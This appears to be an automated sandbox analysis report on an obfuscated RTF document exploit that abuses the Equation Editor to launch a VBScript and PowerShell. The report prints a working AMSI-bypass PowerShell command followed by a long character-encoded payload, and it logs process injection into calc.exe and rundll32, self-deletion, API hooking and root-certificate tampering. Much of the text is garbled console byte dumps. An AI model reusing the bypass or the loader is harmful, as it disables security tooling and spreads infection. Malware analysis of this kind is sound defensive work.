          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C.................0k......H.............................}..v....H.H.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O.................0k.....nn.............................}..v......H.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O.................0k......H.............................}..v....H.H.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[.................0k.....nn.............................}..v......H.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[.................0k......H.............................}..v....H.H.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g.................0k.....nn.............................}..v......H.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g.................0k......H.............................}..v....H.H.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s.................0k.....nn.............................}..v......H.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s.................0k......H.............................}..v....H.H.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......H.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......H.............................}..v....H.H.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......H.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......H.............................}..v....H.H.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......H.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......H.............................}..v....H.H.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......H.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......H.............................}..v....H.H.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......H.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......H.............................}..v....H.H.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......H.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......H.............................}..v....H.H.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......H.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......H.............................}..v....H.H.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......H.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......H.............................}..v....H.H.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......I.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......I.............................}..v....H.I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......I.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......I.............................}..v....H.I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......I.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......I.............................}..v....H.I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......I.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......I.............................}..v....H.I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v.....!I.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....!I.............................}..v....H"I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v.....)I.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....)I.............................}..v....H*I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'.................0k.....nn.............................}..v.....1I.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'.................0k.....1I.............................}..v....H2I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3.................0k.....nn.............................}..v.....9I.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3.................0k.....9I.............................}..v....H:I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?.................0k.....nn.............................}..v.....AI.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?.................0k.....AI.............................}..v....HBI.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K.................0k.....nn.............................}..v.....II.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K.................0k.....II.............................}..v....HJI.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W.................0k.....nn.............................}..v.....QI.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W.................0k.....QI.............................}..v....HRI.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c.................0k.....nn.............................}..v.....YI.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c.................0k.....YI.............................}..v....HZI.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o.................0k.....nn.............................}..v.....aI.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o.................0k.....aI.............................}..v....HbI.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{.................0k.....nn.............................}..v.....iI.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{.................0k.....iI.............................}..v....HjI.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v.....qI.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....qI.............................}..v....HrI.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v.....yI.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....yI.............................}..v....HzI.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......I.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......I.............................}..v....H.I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......I.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......I.............................}..v....H.I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......I.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......I.............................}..v....H.I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......I.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......I.............................}..v....H.I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......I.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......I.............................}..v....H.I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......I.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......I.............................}..v....H.I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......I.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......I.............................}..v....H.I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......I.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......I.............................}..v....H.I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......I.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......I.............................}..v....H.I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....nn.............................}..v......I.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......I.............................}..v....H.I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............).|.I.`.E.`.X....nn.............................}..v......I.....0................jn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......I.............................}..v....0.I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#.................0k.....nn.............................}..v......I.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#.................0k......I.............................}..v......I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.................0k.....nn.............................}..v....P.I.....0.......................r.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.................0k......I.............................}..v......I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;....... .........0k.....nn.............................}..v......I.....0................jn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.................0k......I.............................}..v....P.I.....0...............hkn.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............".0k.... .n.............................}..v.....%\.....0.......................j.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O.................0k.....&\.............................}..v.....'\.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.5.7.............}..v.... +\.....0.................n.....$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[.................0k.....+\.............................}..v....X,\.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............".0k.... .n.............................}..v.... 3\.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g.................0k.....3\.............................}..v....X4\.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............".0k.... .n.............................}..v.... ;\.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s.................0k.....;\.............................}..v....X<\.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................".0k.... .n.............................}..v.... C\.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....C\.............................}..v....XD\.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................".0k.... .n.............................}..v.... K\.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....K\.............................}..v....XL\.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................".0k.... .n.............................}..v.... S\.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....S\.............................}..v....XT\.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................".0k.... .n.............................}..v.... [\.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....[\.............................}..v....X\\.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................".0k.... .n.............................}..v.... c\.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....c\.............................}..v....Xd\.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................".0k.... .n.............................}..v.... k\.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....k\.............................}..v....Xl\.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................".0k.... .n.............................}..v.... s\.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....s\.............................}..v....Xt\.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................".0k.... .n.............................}..v.... {\.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k.....{\.............................}..v....X|\.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................".0k.... .n.............................}..v.... .\.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......\.............................}..v....X.\.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................".0k.... .n.............................}..v.... .\.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......\.............................}..v....X.\.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................".0k.... .n.............................}..v.... .\.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......\.............................}..v....X.\.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................".0k.... .n.............................}..v......\.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......\.............................}..v.... .\.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................".0k.... .n.............................}..v......\.....0...............................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k......\.............................}..v.... .\.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .x.c.e.p.t.i.o.n...........................}..v......\.....0.................n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................0k....p.\.............................}..v......\.....0...............x.n.............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............".0k.... .n.............................}..v......\.....0.......................`.......................
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$0462662046266204626620462662046266204626620462662=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\WINDOWS\syswow64\calc.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\WINDOWS\syswow64\calc.exe"
          Source: C:\Windows\SysWOW64\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
          Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::CrEaTe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDCF6.tmpJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.15350.rtfStatic file information: File size 2186553 > 1048576
          Source: Binary string: wntdll.pdb source: calc.exe, calc.exe, 0000000A.00000003.476792049.0000000000590000.00000004.00000001.sdmp, calc.exe, 0000000A.00000003.473897930.0000000000430000.00000004.00000001.sdmp, calc.exe, 0000000A.00000002.513205717.0000000000B90000.00000040.00000001.sdmp, calc.exe, 0000000A.00000002.512398332.0000000000A10000.00000040.00000001.sdmp, rundll32.exe
          Source: Binary string: rundll32.pdb source: calc.exe, 0000000A.00000002.510696461.0000000000030000.00000040.00020000.sdmp, calc.exe, 0000000A.00000002.510980436.00000000002E4000.00000004.00000020.sdmp
          Source: ~WRF{07064FCF-B986-4FF1-8E5F-48BE8D9FE1ED}.tmp.0.drInitial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          barindex
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_004168F2 push edi; iretd
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00417A03 push edi; retf
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_0041D4B5 push eax; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_0041D56C push eax; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00417D6E push 00000013h; retf
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_0041D502 push eax; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_0041D50B push eax; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_004175E0 push ds; retf
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00405F1A push ebx; ret
          Source: C:\Windows\SysWOW64\calc.exeCode function: 10_2_00A2DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0255DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000ED4B5 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000ED50B push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000ED502 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000ED56C push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000E75E0 push ds; retf
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000E68F2 push edi; iretd
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000E7A03 push edi; retf
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000E7D6E push 00000013h; retf
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_000D5F1A push ebx; ret

          Persistence and Installation Behavior:

          barindex
          Creates processes via WMIShow sources
          Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::CrEaTe

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEB
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
